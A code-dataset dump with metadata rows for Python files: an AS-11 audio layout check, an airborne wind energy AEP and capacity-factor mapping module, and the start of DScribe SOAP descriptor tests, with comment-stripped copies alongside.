hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c3c732fd1bf32628655f32cb83e5438752c6640 | 346 | py | Python | specification_data_files/www.amwa.tv_c0f7b64/block/989/artefacts/audio_track_layout.py | AMWA-TV/AS-11_UK_DPP_HD | 12e100a3de2f60592413a0d21f81f343505e0123 | [
"Apache-2.0"
] | 2 | 2020-02-11T12:55:47.000Z | 2021-07-03T07:04:09.000Z | specification_data_files/www.amwa.tv_c0f7b64/block/989/artefacts/audio_track_layout.py | AMWA-TV/AS-11_UK_DPP_HD | 12e100a3de2f60592413a0d21f81f343505e0123 | [
"Apache-2.0"
] | null | null | null | specification_data_files/www.amwa.tv_c0f7b64/block/989/artefacts/audio_track_layout.py | AMWA-TV/AS-11_UK_DPP_HD | 12e100a3de2f60592413a0d21f81f343505e0123 | [
"Apache-2.0"
] | 1 | 2019-07-14T18:26:16.000Z | 2019-07-14T18:26:16.000Z | CHECK( AS_11_Audio_Track_Layout in [Layout_EBU_R_48_2a,
Layout_EBU_R_123_4b,
Layout_EBU_R_123_4c,
Layout_EBU_R_123_16c,
Layout_EBU_R_123_16d,
Layout_EBU_R_123_16f] )
| 49.428571 | 59 | 0.424855 | CHECK( AS_11_Audio_Track_Layout in [Layout_EBU_R_48_2a,
Layout_EBU_R_123_4b,
Layout_EBU_R_123_4c,
Layout_EBU_R_123_16c,
Layout_EBU_R_123_16d,
Layout_EBU_R_123_16f] )
| true | true |
1c3c73a1a99d2ef2de0e38c64ecbb54c3de9a447 | 16,577 | py | Python | AWERA/power_production/aep_map.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | AWERA/power_production/aep_map.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | AWERA/power_production/aep_map.py | lthUniBonn/AWERA | fa7f210516318bcfcbe1c99abbb5954b0cbaf682 | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import pickle
import matplotlib as mpl
import matplotlib.pyplot as plt
import cartopy
import cartopy.crs as ccrs
from ..utils.plotting_utils import plot_map
def get_mask_discontinuities(df):
"""Identify discontinuities in the power curves. The provided approach is
obtained by trial and error and should be checked carefully when applying
to newly generated power curves."""
mask = np.concatenate(((True,), (np.diff(df['P [W]']) > -5e2)))
mask = np.logical_or(mask, df['v_100m [m/s]'] > 10) # only apply mask on low wind speeds
if df['P [W]'].iloc[-1] < 0 or df['P [W]'].iloc[-1] - df['P [W]'].iloc[-2] > 5e2:
mask.iloc[-1] = False
#print('mask: ', mask)
return ~mask
def plot_aep_matrix(config, freq, power, aep, plot_info=''):
"""Visualize the annual energy production contributions of each wind
speed bin."""
n_clusters = freq.shape[0]
mask_array = lambda m: np.ma.masked_where(m == 0., m)
fig, ax = plt.subplots(1, 3, sharex=True, sharey=True, figsize=(7, 3.5))
plt.subplots_adjust(top=0.98, bottom=0.05, left=0.065, right=0.98)
ax[0].set_ylabel("Cluster label [-]")
ax[0].set_yticks(range(n_clusters))
ax[0].set_yticklabels(range(1, n_clusters+1))
for a in ax:
a.set_xticks((0, freq.shape[1]-1))
a.set_xticklabels(('cut-in', 'cut-out'))
im0 = ax[0].imshow(mask_array(freq), aspect='auto')
cbar0 = plt.colorbar(im0, orientation="horizontal", ax=ax[0], aspect=12,
pad=.17)
cbar0.set_label("Probability [%]")
im1 = ax[1].imshow(mask_array(power)*1e-3, aspect='auto')
cbar1 = plt.colorbar(im1, orientation="horizontal", ax=ax[1], aspect=12,
pad=.17)
cbar1.set_label("Power [kW]")
im2 = ax[2].imshow(mask_array(aep)*1e-6, aspect='auto')
cbar2 = plt.colorbar(im2, orientation="horizontal", ax=ax[2], aspect=12,
pad=.17)
cbar2.set_label("AEP contribution [MWh]")
if not config.Plotting.plots_interactive:
plt.savefig(config.IO.result_dir + 'aep_production_conribution'
+ plot_info + '.pdf')
def evaluate_aep(config):
"""Calculate the annual energy production for the requested cluster wind
resource representation. Reads the wind speed distribution file, then
the csv file of each power curve, post-processes the curve, and
numerically integrates the product of the power and probability curves
to determine the AEP."""
n_clusters = config.Clustering.n_clusters
with open(config.IO.freq_distr, 'rb') as f:
freq_distr = pickle.load(f)
freq_full = freq_distr['frequency']
wind_speed_bin_limits = freq_distr['wind_speed_bin_limits']
loc_aep = []
p_n = []
for i_loc, loc in enumerate(config.Data.locations):
# Select location data
freq = freq_full[i_loc, :, :]
p_bins = np.zeros(freq.shape)
for i in range(n_clusters):
i_profile = i + 1
# Read power curve file
# TODO make optional trianing / normal
df = pd.read_csv(config.IO.power_curve
.format(suffix='csv',
i_profile=i_profile),
sep=";")
# TODO drop? mask_faulty_point = get_mask_discontinuities(df)
v = df['v_100m [m/s]'].values # .values[~mask_faulty_point]
p = df['P [W]'].values # .values[~mask_faulty_point]
if i_loc == 0:
# Once extract nominal (maximal) power of cluster
p_n.append(np.max(p))
# assert v[0] == wind_speed_bin_limits[i, 0]
# TODO differences at 10th decimal threw assertion error
err_str = "Wind speed range of power curve {} is different"\
" than that of probability distribution: " \
"{:.2f} and {:.2f} m/s, respectively."
if np.abs(v[0] - wind_speed_bin_limits[i, 0]) > 1e-6:
print(err_str.format(i_profile,
wind_speed_bin_limits[i, 0], v[0]))
if np.abs(v[-1] - wind_speed_bin_limits[i, -1]) > 1e-6:
print(err_str.format(i_profile,
wind_speed_bin_limits[i, -1], v[-1]))
# assert np.abs(v[-1] -
# wind_speed_bin_limits[i, -1]) < 1e-6, err_str
# Determine wind speeds at bin centers and respective power output.
v_bins = (wind_speed_bin_limits[i, :-1]
+ wind_speed_bin_limits[i, 1:])/2.
p_bins[i, :] = np.interp(v_bins, v, p, left=0., right=0.)
# Weight profile energy production with the frequency of the cluster
# sum(freq) < 100: non-operation times included
aep_bins = p_bins * freq/100. * 24*365
aep_sum = np.sum(aep_bins)*1e-6
loc_aep.append(aep_sum)
if i_loc % 100 == 0:
print("AEP: {:.2f} MWh".format(aep_sum))
# plot_aep_matrix(config, freq, p_bins, aep_bins,
# plot_info=(config.Data.data_info+str(i_loc)))
# print(('AEP matrix plotted for location number'
# ' {} of {} - at lat {}, lon {}').format(i_loc,
# config.Data.n_locs,
# loc[0], loc[1]))
# Estimate perfectly running & perfect conditions: nominal power
# get relative cluster frequency:
rel_cluster_freq = np.sum(freq_full, axis=(0, 2))/config.Data.n_locs
print('Cluster frequency:', rel_cluster_freq)
print('Cluster frequency sum:', np.sum(rel_cluster_freq))
# Scale up to 1: run full time with same relative impact of clusters
rel_cluster_freq = rel_cluster_freq/np.sum(rel_cluster_freq)
aep_n_cluster = np.sum(np.array(p_n)*rel_cluster_freq)*24*365*1e-6
aep_n_max = np.max(p_n)*24*365*1e-6
print('Nominal aep [MWh]:', aep_n_cluster, aep_n_max)
# TODO write aep to file
return loc_aep, aep_n_max
# TODO nominal AEP -> average power and nominal power
def plot_aep_map(p_loc, aep_loc, c_f_loc,
plots_interactive=True,
file_name='aep_p_cf_contour_maps.pdf',
file_name_aep='aep_contour_map.pdf'):
from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
plot_panel_1x3_seperate_colorbar
column_titles = ['Mean Cycle Power', 'AEP', r'$c_f$']
linspace00 = np.linspace(0, 6, 21)
plot_item00 = {
'data': p_loc,
'contour_fill_levels': linspace00,
'contour_line_levels': [1, 3, 6],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace00[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': 'P [kW]',
'extend': 'max',
}
linspace01 = np.linspace(0, 54, 21)
plot_item01 = {
'data': aep_loc,
'contour_fill_levels': linspace01,
'contour_line_levels': [10., 30., 50.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace01[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': 'AEP [MWh/a]',
'extend': 'max',
}
linspace02 = np.linspace(0, 60, 21)
plot_item02 = {
'data': c_f_loc*100,
'contour_fill_levels': linspace02,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace02[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
# 'extend': 'max',
}
plot_items = [plot_item00, plot_item01, plot_item02]
eval_contour_fill_levels(plot_items)
plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
if not plots_interactive:
plt.savefig(file_name)
from ..utils.plotting_utils import plot_single_map
plot_single_map(aep_loc, title='', label='',
plot_item=plot_item01)
if not plots_interactive:
plt.savefig(file_name_aep)
def plot_cf_map(cf_1, cf_2):
from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
plot_panel_1x3_seperate_colorbar
column_titles = [r'c$_f$ Turbine', r'c$_f$ AWE', r'c$_f$ Turbine']
linspace00 = np.linspace(0, 65, 21)
plot_item00 = {
'data': cf_1*100,
'contour_fill_levels': linspace00,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace00[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
# 'extend': 'max',
}
linspace01 = np.linspace(0, 65, 21)
plot_item01 = {
'data': cf_2*100,
'contour_fill_levels': linspace01,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace01[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
# 'extend': 'max',
}
# TODO plot only 2
linspace02 = np.linspace(0, 65, 21)
plot_item02 = {
'data': cf_1*100,
'contour_fill_levels': linspace02,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace02[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
# 'extend': 'max',
}
plot_items = [plot_item00, plot_item01, plot_item02]
eval_contour_fill_levels(plot_items)
plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
def plot_discrete_map(config, values, title='', label='',
plots_interactive=True,
file_name='discrete_map.pdf'):
# Map range
cm = 1/2.54
# Plot Value
plt.figure(figsize=(13*cm, 14.5*cm))
mrc = ccrs.Mercator()
ax = plt.axes(projection=mrc)
ax.coastlines(zorder=4)
# TODO resolution='50m', color='black', linewidth=1)
ax.set_extent([config.Data.lon_range[0],
config.Data.lon_range[1],
config.Data.lat_range[0],
config.Data.lat_range[1]])
plt.title(title)
color_map = plt.get_cmap('YlOrRd')
normalize = mpl.colors.Normalize(vmin=np.min(values),
vmax=np.max(values))
lons_grid, lats_grid = np.meshgrid(config.Data.all_lons,
config.Data.all_lats)
# Compute map projection coordinates.
# TODO does this work now? threw error too many values to unpack
# - works locally
ax.pcolormesh(lons_grid, lats_grid, values,
cmap=color_map, norm=normalize,
transform=cartopy.crs.PlateCarree(),
zorder=3)
cbar_ax, _ = mpl.colorbar.make_axes(ax)
mpl.colorbar.ColorbarBase(cbar_ax, cmap=color_map, norm=normalize,
label=label)
if not plots_interactive:
plt.savefig(file_name)
def aep_map(config):
# TODO cleanup - what is needed in the end?
aep, aep_n = evaluate_aep(config)
# TODO reinclude map plotting
# Match locations with values - rest NaN
n_lats = len(config.Data.all_lats)
n_lons = len(config.Data.all_lons)
p_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
aep_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
c_f_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
# TODO right way around?
for i, i_loc in enumerate(config.Data.i_locations):
p_loc[i_loc[0], i_loc[1]] = aep[i]/365/24*1000 # p [kW]
aep_loc[i_loc[0], i_loc[1]] = aep[i] # aep [MWh]
c_f_loc[i_loc[0], i_loc[1]] = aep[i]/aep_n # c_f [-]
if np.sum(p_loc.mask) == 0:
# Plot continuous aep map
print('Location wise AEP determined. Plot map:')
# plot_aep_map(p_loc, aep_loc, c_f_loc,
# plots_interactive=config.Plotting.plots_interactive,
# file_name=config.IO.plot_output.format(
# title='aep_p_cf_contour_maps'),
# file_name_aep=config.IO.plot_output.format(
# title='aep_contour_map')
# )
# Plot single
plot_map(config, aep_loc,
title='AEP',
label=r'AEP [MWh/a]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='aep_map'),
line_levels=[10., 30., 50.],
fill_range=[0, 54],
overflow=None)
plot_map(config, p_loc,
title='Mean Cycle Power',
label='P [kW]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='p_map'),
line_levels=[1., 3., 6.],
fill_range=[0, 6],
overflow=None)
plot_map(config, c_f_loc*100,
title=r'$c_f$',
label=r'$c_f$ [%]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='cf_map'),
line_levels=[20., 40., 60.],
fill_range=[0, 60],
overflow=None)
else:
plot_discrete_map(config,
aep_loc,
title="AEP for {} clusters".format(
config.Clustering.n_clusters),
label='AEP [MWh]',
plots_interactive=config.Plotting.plots_interactive,
file_name=config.IO.plot_output.format(
title='aep_discrete_map')
)
# plot_discrete_map(config,
# c_f_loc,
# title="Capacity factor for {} clusters".format(
# config.Clustering.n_clusters),
# label=r'c$_f$ [-]',
# plots_interactive=config.Plotting.plots_interactive,
# file_name=config.IO.plot_output.format(
# title='cf_discrete_map'))
return aep_loc, c_f_loc
def cf_turbine(config):
p_max = 2.04e6 # W
# get sample wind speeds at 60m
turb_height = 60 # m
from ..eval.optimal_harvesting_height import get_wind_speed_at_height, \
barometric_height_formula, match_loc_data_map_data
v_turb, _ = get_wind_speed_at_height(config, set_height=turb_height)
# Get Rho at turb height
rho = barometric_height_formula(turb_height)
def calc_turbine_power(v, rho):
# REpower MM82
# https://www.thewindpower.net/store_manufacturer_turbine_en.php?id_type=7
power_coeff = np.array([23070., -111500., 134600.])
# p = np.zeros((len(v[:,0]), len(v[0,:])))
p = np.zeros(v.shape)
p[v < 2.5] = 0
p[v > 11.7] = rho/1.01325*2000000.
p[v > 22.] = 0
p[np.logical_and(v >= 2.5, v <= 11.7)] = rho/1.01325*np.polyval(
power_coeff, v[np.logical_and(v >= 2.5, v <= 11.7)])
p[p > 2000000.] = 2000000.
# for i_t in range(len(v)):
# if v[i_t] < 2.5:
# p[i_t] = 0.
# elif v[i_t] > 11.7:
# p[i_t] = rho/1.01325*2000000.
# if p[i_t] > 2000000.:
# p[i_t] = 2000000.
# elif v[i_t] > 22.:
# p[i_t] = 0.
# else:
# p[i_t] = rho/1.01325*np.polyval(power_coeff, v[i_t])
# if p[i_t] > 2000000.:
# p[i_t] = 2000000.
# print(rho)
return p
p = calc_turbine_power(v_turb, rho)
# aep = np.mean(p, axis=1)*365*24
cf = np.mean(p, axis=1) / p_max
return match_loc_data_map_data(config, cf)
def compare_cf_AWE_turbine(config):
cf_turb = cf_turbine(config)
aep_AWE, cf_AWE = aep_map(config)
plot_cf_map(cf_turb, cf_AWE)
plt.show()
if __name__ == "__main__":
from ..config import Config
config = Config()
# TODO include this into aep from own plotting
# plot_power_and_wind_speed_probability_curves() #TODO where??
aep_map(config)
if config.Plotting.plots_interactive:
plt.show()
| 39.657895 | 93 | 0.563069 | import numpy as np
import pandas as pd
import pickle
import matplotlib as mpl
import matplotlib.pyplot as plt
import cartopy
import cartopy.crs as ccrs
from ..utils.plotting_utils import plot_map
def get_mask_discontinuities(df):
mask = np.concatenate(((True,), (np.diff(df['P [W]']) > -5e2)))
mask = np.logical_or(mask, df['v_100m [m/s]'] > 10)
if df['P [W]'].iloc[-1] < 0 or df['P [W]'].iloc[-1] - df['P [W]'].iloc[-2] > 5e2:
mask.iloc[-1] = False
return ~mask
def plot_aep_matrix(config, freq, power, aep, plot_info=''):
n_clusters = freq.shape[0]
mask_array = lambda m: np.ma.masked_where(m == 0., m)
fig, ax = plt.subplots(1, 3, sharex=True, sharey=True, figsize=(7, 3.5))
plt.subplots_adjust(top=0.98, bottom=0.05, left=0.065, right=0.98)
ax[0].set_ylabel("Cluster label [-]")
ax[0].set_yticks(range(n_clusters))
ax[0].set_yticklabels(range(1, n_clusters+1))
for a in ax:
a.set_xticks((0, freq.shape[1]-1))
a.set_xticklabels(('cut-in', 'cut-out'))
im0 = ax[0].imshow(mask_array(freq), aspect='auto')
cbar0 = plt.colorbar(im0, orientation="horizontal", ax=ax[0], aspect=12,
pad=.17)
cbar0.set_label("Probability [%]")
im1 = ax[1].imshow(mask_array(power)*1e-3, aspect='auto')
cbar1 = plt.colorbar(im1, orientation="horizontal", ax=ax[1], aspect=12,
pad=.17)
cbar1.set_label("Power [kW]")
im2 = ax[2].imshow(mask_array(aep)*1e-6, aspect='auto')
cbar2 = plt.colorbar(im2, orientation="horizontal", ax=ax[2], aspect=12,
pad=.17)
cbar2.set_label("AEP contribution [MWh]")
if not config.Plotting.plots_interactive:
plt.savefig(config.IO.result_dir + 'aep_production_conribution'
+ plot_info + '.pdf')
def evaluate_aep(config):
n_clusters = config.Clustering.n_clusters
with open(config.IO.freq_distr, 'rb') as f:
freq_distr = pickle.load(f)
freq_full = freq_distr['frequency']
wind_speed_bin_limits = freq_distr['wind_speed_bin_limits']
loc_aep = []
p_n = []
for i_loc, loc in enumerate(config.Data.locations):
freq = freq_full[i_loc, :, :]
p_bins = np.zeros(freq.shape)
for i in range(n_clusters):
i_profile = i + 1
df = pd.read_csv(config.IO.power_curve
.format(suffix='csv',
i_profile=i_profile),
sep=";")
v = df['v_100m [m/s]'].values
p = df['P [W]'].values
if i_loc == 0:
p_n.append(np.max(p))
err_str = "Wind speed range of power curve {} is different"\
" than that of probability distribution: " \
"{:.2f} and {:.2f} m/s, respectively."
if np.abs(v[0] - wind_speed_bin_limits[i, 0]) > 1e-6:
print(err_str.format(i_profile,
wind_speed_bin_limits[i, 0], v[0]))
if np.abs(v[-1] - wind_speed_bin_limits[i, -1]) > 1e-6:
print(err_str.format(i_profile,
wind_speed_bin_limits[i, -1], v[-1]))
v_bins = (wind_speed_bin_limits[i, :-1]
+ wind_speed_bin_limits[i, 1:])/2.
p_bins[i, :] = np.interp(v_bins, v, p, left=0., right=0.)
aep_bins = p_bins * freq/100. * 24*365
aep_sum = np.sum(aep_bins)*1e-6
loc_aep.append(aep_sum)
if i_loc % 100 == 0:
print("AEP: {:.2f} MWh".format(aep_sum))
rel_cluster_freq = np.sum(freq_full, axis=(0, 2))/config.Data.n_locs
print('Cluster frequency:', rel_cluster_freq)
print('Cluster frequency sum:', np.sum(rel_cluster_freq))
rel_cluster_freq = rel_cluster_freq/np.sum(rel_cluster_freq)
aep_n_cluster = np.sum(np.array(p_n)*rel_cluster_freq)*24*365*1e-6
aep_n_max = np.max(p_n)*24*365*1e-6
print('Nominal aep [MWh]:', aep_n_cluster, aep_n_max)
return loc_aep, aep_n_max
def plot_aep_map(p_loc, aep_loc, c_f_loc,
plots_interactive=True,
file_name='aep_p_cf_contour_maps.pdf',
file_name_aep='aep_contour_map.pdf'):
from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
plot_panel_1x3_seperate_colorbar
column_titles = ['Mean Cycle Power', 'AEP', r'$c_f$']
linspace00 = np.linspace(0, 6, 21)
plot_item00 = {
'data': p_loc,
'contour_fill_levels': linspace00,
'contour_line_levels': [1, 3, 6],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace00[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': 'P [kW]',
'extend': 'max',
}
linspace01 = np.linspace(0, 54, 21)
plot_item01 = {
'data': aep_loc,
'contour_fill_levels': linspace01,
'contour_line_levels': [10., 30., 50.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace01[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': 'AEP [MWh/a]',
'extend': 'max',
}
linspace02 = np.linspace(0, 60, 21)
plot_item02 = {
'data': c_f_loc*100,
'contour_fill_levels': linspace02,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace02[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
plot_items = [plot_item00, plot_item01, plot_item02]
eval_contour_fill_levels(plot_items)
plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
if not plots_interactive:
plt.savefig(file_name)
from ..utils.plotting_utils import plot_single_map
plot_single_map(aep_loc, title='', label='',
plot_item=plot_item01)
if not plots_interactive:
plt.savefig(file_name_aep)
def plot_cf_map(cf_1, cf_2):
from ..resource_analysis.plot_maps import eval_contour_fill_levels, \
plot_panel_1x3_seperate_colorbar
column_titles = [r'c$_f$ Turbine', r'c$_f$ AWE', r'c$_f$ Turbine']
linspace00 = np.linspace(0, 65, 21)
plot_item00 = {
'data': cf_1*100,
'contour_fill_levels': linspace00,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace00[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
linspace01 = np.linspace(0, 65, 21)
plot_item01 = {
'data': cf_2*100,
'contour_fill_levels': linspace01,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace01[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
linspace02 = np.linspace(0, 65, 21)
plot_item02 = {
'data': cf_1*100,
'contour_fill_levels': linspace02,
'contour_line_levels': [20., 40., 60.],
'contour_line_label_fmt': '%.0f',
'colorbar_ticks': linspace02[::4],
'colorbar_tick_fmt': '{:.0f}',
'colorbar_label': r'c$_f$ [%]',
}
plot_items = [plot_item00, plot_item01, plot_item02]
eval_contour_fill_levels(plot_items)
plot_panel_1x3_seperate_colorbar(plot_items, column_titles)
def plot_discrete_map(config, values, title='', label='',
plots_interactive=True,
file_name='discrete_map.pdf'):
cm = 1/2.54
plt.figure(figsize=(13*cm, 14.5*cm))
mrc = ccrs.Mercator()
ax = plt.axes(projection=mrc)
ax.coastlines(zorder=4)
ax.set_extent([config.Data.lon_range[0],
config.Data.lon_range[1],
config.Data.lat_range[0],
config.Data.lat_range[1]])
plt.title(title)
color_map = plt.get_cmap('YlOrRd')
normalize = mpl.colors.Normalize(vmin=np.min(values),
vmax=np.max(values))
lons_grid, lats_grid = np.meshgrid(config.Data.all_lons,
config.Data.all_lats)
ax.pcolormesh(lons_grid, lats_grid, values,
cmap=color_map, norm=normalize,
transform=cartopy.crs.PlateCarree(),
zorder=3)
cbar_ax, _ = mpl.colorbar.make_axes(ax)
mpl.colorbar.ColorbarBase(cbar_ax, cmap=color_map, norm=normalize,
label=label)
if not plots_interactive:
plt.savefig(file_name)
def aep_map(config):
aep, aep_n = evaluate_aep(config)
n_lats = len(config.Data.all_lats)
n_lons = len(config.Data.all_lons)
p_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
aep_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
c_f_loc = np.ma.array(np.zeros((n_lats, n_lons)), mask=True)
for i, i_loc in enumerate(config.Data.i_locations):
p_loc[i_loc[0], i_loc[1]] = aep[i]/365/24*1000
aep_loc[i_loc[0], i_loc[1]] = aep[i]
c_f_loc[i_loc[0], i_loc[1]] = aep[i]/aep_n
if np.sum(p_loc.mask) == 0:
print('Location wise AEP determined. Plot map:')
plot_map(config, aep_loc,
title='AEP',
label=r'AEP [MWh/a]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='aep_map'),
line_levels=[10., 30., 50.],
fill_range=[0, 54],
overflow=None)
plot_map(config, p_loc,
title='Mean Cycle Power',
label='P [kW]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='p_map'),
line_levels=[1., 3., 6.],
fill_range=[0, 6],
overflow=None)
plot_map(config, c_f_loc*100,
title=r'$c_f$',
label=r'$c_f$ [%]',
log_scale=False,
n_decimals=0,
output_file_name=config.IO.plot_output.format(
title='cf_map'),
line_levels=[20., 40., 60.],
fill_range=[0, 60],
overflow=None)
else:
plot_discrete_map(config,
aep_loc,
title="AEP for {} clusters".format(
config.Clustering.n_clusters),
label='AEP [MWh]',
plots_interactive=config.Plotting.plots_interactive,
file_name=config.IO.plot_output.format(
title='aep_discrete_map')
)
return aep_loc, c_f_loc
def cf_turbine(config):
p_max = 2.04e6
turb_height = 60
from ..eval.optimal_harvesting_height import get_wind_speed_at_height, \
barometric_height_formula, match_loc_data_map_data
v_turb, _ = get_wind_speed_at_height(config, set_height=turb_height)
rho = barometric_height_formula(turb_height)
def calc_turbine_power(v, rho):
power_coeff = np.array([23070., -111500., 134600.])
p = np.zeros(v.shape)
p[v < 2.5] = 0
p[v > 11.7] = rho/1.01325*2000000.
p[v > 22.] = 0
p[np.logical_and(v >= 2.5, v <= 11.7)] = rho/1.01325*np.polyval(
power_coeff, v[np.logical_and(v >= 2.5, v <= 11.7)])
p[p > 2000000.] = 2000000.
return p
p = calc_turbine_power(v_turb, rho)
cf = np.mean(p, axis=1) / p_max
return match_loc_data_map_data(config, cf)
def compare_cf_AWE_turbine(config):
cf_turb = cf_turbine(config)
aep_AWE, cf_AWE = aep_map(config)
plot_cf_map(cf_turb, cf_AWE)
plt.show()
if __name__ == "__main__":
from ..config import Config
config = Config()
config)
if config.Plotting.plots_interactive:
plt.show()
| true | true |
1c3c74555d9da04e5e1876e8c8ddebb140e9366d | 37,406 | py | Python | regtests/soap.py | anjohan/dscribe | 9daf60453076d0a18088a5d70deddd737903e665 | [
"Apache-2.0"
] | null | null | null | regtests/soap.py | anjohan/dscribe | 9daf60453076d0a18088a5d70deddd737903e665 | [
"Apache-2.0"
] | null | null | null | regtests/soap.py | anjohan/dscribe | 9daf60453076d0a18088a5d70deddd737903e665 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Copyright 2019 DScribe developers
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import math
import unittest
import numpy as np
import scipy
import scipy.sparse
from scipy.integrate import tplquad
from scipy.linalg import sqrtm
from dscribe.descriptors import SOAP
from testbaseclass import TestBaseClass
from ase import Atoms
from ase.build import molecule
H2O = Atoms(
cell=[
[1.0, 0.0, 0.0],
[0.0, 1.0, 0.0],
[0.0, 0.0, 1.0]
],
positions=[
[0, 0, 0],
[0.95, 0, 0],
[0.95*(1+math.cos(76/180*math.pi)), 0.95*math.sin(76/180*math.pi), 0.0]
],
symbols=["H", "O", "H"],
)
H = Atoms(
cell=[
[15.0, 0.0, 0.0],
[0.0, 15.0, 0.0],
[0.0, 0.0, 15.0]
],
positions=[
[0, 0, 0],
],
symbols=["H"],
)
class SoapTests(TestBaseClass, unittest.TestCase):
def test_constructor(self):
"""Tests different valid and invalid constructor values.
"""
# Invalid gaussian width
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=5, sigma=0, nmax=5, lmax=5, periodic=True)
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=5, sigma=-1, nmax=5, lmax=5, periodic=True)
# Invalid rcut
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=5, periodic=True)
# Invalid lmax
with self.assertRaises(ValueError):
SOAP(species=[-1, 2], rcut=0.5, sigma=0, nmax=5, lmax=10, rbf="gto", periodic=True)
# Invalid nmax
with self.assertRaises(ValueError):
SOAP(species=["H", "O"], rcut=4, sigma=1, nmax=0, lmax=8, rbf="gto", periodic=True)
# Too high radial basis set density: poly
with self.assertRaises(ValueError):
a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=12, lmax=8, rbf="polynomial", periodic=False)
a.create(H2O)
# Too high radial basis set density: gto
with self.assertRaises(ValueError):
a = SOAP(species=["H", "O"], rcut=10, sigma=0.5, nmax=20, lmax=8, rbf="gto", periodic=False)
a.create(H2O)
def test_properties(self):
"""Used to test that changing the setup through properties works as
intended.
"""
# Test changing species
a = SOAP(
species=[1, 8],
rcut=3,
nmax=3,
lmax=3,
sparse=False,
)
nfeat1 = a.get_number_of_features()
